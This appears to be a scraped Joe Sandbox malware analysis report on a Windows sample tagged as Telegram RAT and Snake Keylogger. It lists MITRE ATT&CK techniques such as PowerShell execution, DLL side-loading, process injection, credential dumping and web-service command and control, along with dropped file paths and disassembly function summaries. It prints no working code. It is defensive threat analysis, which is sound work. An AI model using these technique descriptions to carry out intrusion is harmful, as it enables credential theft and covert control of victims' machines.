Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Kb94RzMYNf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3su10i3.wei.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwkjnwoi.5gz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pr1k2cjl.wkj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v12alojy.s0h.ps1

C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll

C:\Users\user\AppData\Local\neoimpressionism\Cordts.for

C:\Users\user\AppData\Local\neoimpressionism\Isoserine.neg

C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe

C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe:Zone.Identifier

C:\Users\user\AppData\Local\neoimpressionism\Starost.Aud169

C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe

Windows Analysis Report
Kb94RzMYNf.exe

Function 004032A0 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Function 004052EE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00406072 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405841 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403C3C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403899 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 004051AF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00403027 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre